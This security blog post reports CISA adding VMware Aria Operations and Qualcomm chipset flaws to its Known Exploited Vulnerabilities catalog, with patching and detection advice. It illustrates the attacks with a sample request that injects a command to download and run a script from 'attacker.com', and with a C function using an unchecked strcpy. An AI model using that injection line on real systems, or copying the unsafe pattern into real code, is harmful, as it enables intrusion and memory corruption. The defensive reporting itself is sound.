CISA Adds VMware and Qualcomm Flaws to Known Exploited Vulnerabilities Catalog

CyberDefender 8 mins0

On March 3, 2026, the Cybersecurity and Infrastructure Security Agency (CISA) announced that two actively exploited vulnerabilities were added to its Known Exploited Vulnerabilities (KEV) Catalog. These additions highlight the ongoing threat posed by unpatched software and the importance of timely vulnerability management.

The two vulnerabilities added are:

  • CVE-2026-22719 – VMware Aria Operations Command Injection / Remote Code Execution
  • CVE-2026-21385 – Qualcomm Multiple Chipsets Memory Corruption Vulnerability

Both vulnerabilities have confirmed exploitation in the wild, making them high priority for organizations, especially government agencies and critical infrastructure providers.

Understanding the CISA Known Exploited Vulnerabilities (KEV) Catalog

The KEV Catalog is a curated list of vulnerabilities that are actively exploited by threat actors. It is part of Binding Operational Directive (BOD) 22-01, which requires U.S. federal agencies to remediate listed vulnerabilities within specified timelines.

Key characteristics of KEV vulnerabilities:

  • Confirmed active exploitation
  • High likelihood of privilege escalation or remote code execution
  • Significant risk to enterprise and government networks
  • Mandatory remediation deadlines for federal agencies

Organizations worldwide rely on this catalog as a prioritization framework for patch management.

Vulnerability #1 — CVE-2026-22719 (VMware Aria Operations)

Overview

CVE-2026-22719 is a critical vulnerability affecting VMware Aria Operations, a platform used for monitoring, analytics, and automation in cloud and virtualized environments.

  • Type: Command Injection / Remote Code Execution
  • Vendor: VMware (Broadcom)
  • Impact: Remote attackers can execute arbitrary commands on affected servers
  • Exploit Status: Actively exploited in the wild

Because Aria Operations often runs with high privileges in enterprise environments, exploitation can lead to full infrastructure compromise.

Technical Breakdown

The vulnerability stems from improper input validation in command execution routines.

Simplified Attack Flow

  1. Attacker sends a crafted request to the Aria Operations interface.
  2. The request injects malicious shell commands.
  3. The server executes the command with system privileges.

Example conceptual payload:

POST /api/operations
cmd=collect_metrics; wget attacker.com/backdoor.sh; sh backdoor.sh

If successful, attackers can:

  • Deploy backdoors
  • Pivot into internal networks
  • Steal credentials
  • Deploy ransomware

Potential Impact

Successful exploitation can result in:

  • Remote Code Execution (RCE)
  • Infrastructure takeover
  • Unauthorized data access
  • Persistence within cloud environments

Because the platform manages virtual infrastructure telemetry, attackers could potentially gain deep insight into internal network topology.

Vulnerability #2 — CVE-2026-21385 (Qualcomm Chipsets)

Overview

CVE-2026-21385 affects multiple Qualcomm chipsets used in Android devices.

  • Type: Memory Corruption
  • Affected Systems: Smartphones, embedded devices, and IoT hardware
  • Exploit Status: Observed in targeted attacks

Memory corruption vulnerabilities can enable attackers to execute arbitrary code or escalate privileges within the device environment.

Technical Analysis

The vulnerability is caused by improper handling of user-supplied data in graphics or driver components.

Possible exploitation chain:

  1. Malicious app or crafted input triggers the vulnerable component.
  2. Buffer overflow or memory corruption occurs.
  3. Attacker executes arbitrary code.

Simplified example:

void process_input(char *data){
    char buffer[128];
    strcpy(buffer, data);   // No bounds check
}

If the input exceeds the buffer size, attackers may overwrite adjacent memory structures and gain code execution.

Impact on Mobile Security

Affected devices could be used to:

  • Steal sensitive user data
  • Escalate privileges
  • Install persistent malware
  • Spy on communications

Given Qualcomm’s widespread use, this vulnerability potentially impacts hundreds of Android device models.

Why These Vulnerabilities Matter

These KEV additions highlight several important cybersecurity trends:

1. Exploitation Before Patching

Attackers increasingly exploit vulnerabilities immediately after disclosure.

2. Infrastructure Targets

Cloud monitoring tools like VMware platforms are high-value targets.

3. Mobile Supply Chain Risks

Chipset vulnerabilities impact entire device ecosystems, not just applications.

Mitigation and Remediation

Organizations should immediately implement the following measures.

1. Patch Vulnerable Systems

  • Apply vendor updates for VMware Aria Operations
  • Deploy Android security patches containing Qualcomm fixes

Federal agencies must patch within the BOD 22-01 remediation deadline.

2. Network Hardening

For VMware environments:

  • Restrict management interfaces
  • Use VPN or internal-only access
  • Disable unnecessary services

3. Threat Monitoring

Monitor logs for:

  • Suspicious command executions
  • Unexpected outbound connections
  • Privilege escalation attempts

Security tools to leverage:

  • SIEM
  • EDR/XDR
  • Network traffic analysis

4. Vulnerability Management Automation

Security teams should integrate:

  • Continuous vulnerability scanning
  • Automated patch deployment
  • KEV feed monitoring

Example pipeline:

CISA KEV Feed → Vulnerability Scanner → Patch Management → Verification

Detection Techniques

Security teams can detect potential exploitation using:

Log Analysis

Look for unusual command execution patterns:

/var/log/syslog
/usr/bin/bash -c suspicious_command

Network Indicators

  • Outbound traffic to unknown domains
  • Unexpected DNS queries

Endpoint Monitoring

Indicators:

  • New privileged processes
  • Unknown binaries in system directories

Strategic Takeaways

The addition of CVE-2026-22719 and CVE-2026-21385 demonstrates:

  • Attackers rapidly weaponize vulnerabilities.
  • Infrastructure and hardware layers are both targets.
  • Patch prioritization must rely on real-world exploitation data.

The CISA KEV catalog serves as a critical resource for organizations seeking to prioritize remediation efforts and reduce cyber risk.

Conclusion

The latest KEV additions reinforce a fundamental cybersecurity principle:

Unpatched vulnerabilities remain one of the easiest entry points for attackers.

Organizations should prioritize these vulnerabilities immediately by:

  • Applying vendor patches
  • Restricting access to critical services
  • Implementing continuous monitoring

Proactive vulnerability management remains one of the most effective defenses against modern cyber threats.

Key Takeaway:
If a vulnerability appears in the CISA KEV catalog, it should be treated as urgent and actively weaponized.

CyberDefender